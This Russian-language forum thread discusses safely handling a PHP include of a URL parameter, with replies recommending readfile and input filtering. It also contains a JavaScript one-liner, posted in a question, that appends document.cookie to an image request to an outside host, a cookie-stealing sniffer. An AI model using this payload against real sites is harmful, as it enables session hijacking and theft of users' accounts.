![]() |
Безопасное использование include
Есть скрипт ему передаётся параметр img.
Например script.php?img=http://site.ru/img.gif Дак вот я зделал такую проверку PHP код:
PHP код:
Если да то как от этого защитится?? ------------------------------- И ещё один вопрос как отобразить через javascript картинку которая является снифером. Например Код:
img = new Image(); img.src = "http://site.ru/img.gif?"+document.cookie; |
Что за бред? Зачем инклюдить, кстати: Юзай http://us3.php.net/readfile =)
|
попробуй
PHP код:
|
Да, и вот тебе пример сниффа....
PHP код:
|
На первый вопрос ответили всем спасибо.
Теперь бы хотелось услышать ответ на второй. |
2. Фильтровать все вводимые значения.
|
Ага, с добрым утром всех.
getimagesize() еще никто не отменял. Да и как правильно заметил nerezus, readfile более оптимальное решение для поставленной задачи. Тестировал скорость работы readfile и include (хотя че тут тестить - ежу понятно что include тормознее в разы). Да и потом если ты делаешь header() с заголовком картинки, а потом readfile()... Насчет твоего второго вопроса - все просто, скрипт подкинул LoFFi. 2 LoFFi в данном примере проще юзать readfile, чем fopen. |
Всё с первым я уже разобрался, просто забыл про readfile совсем из головы вылетела, что можно читать, а не инклудить файлы.
А на второй вопрос я так и неполучил чёткого ответа. |
Цитата:
|
И гдеже ответ на второй вопрос
Цитата:
|
| Время: 00:28 |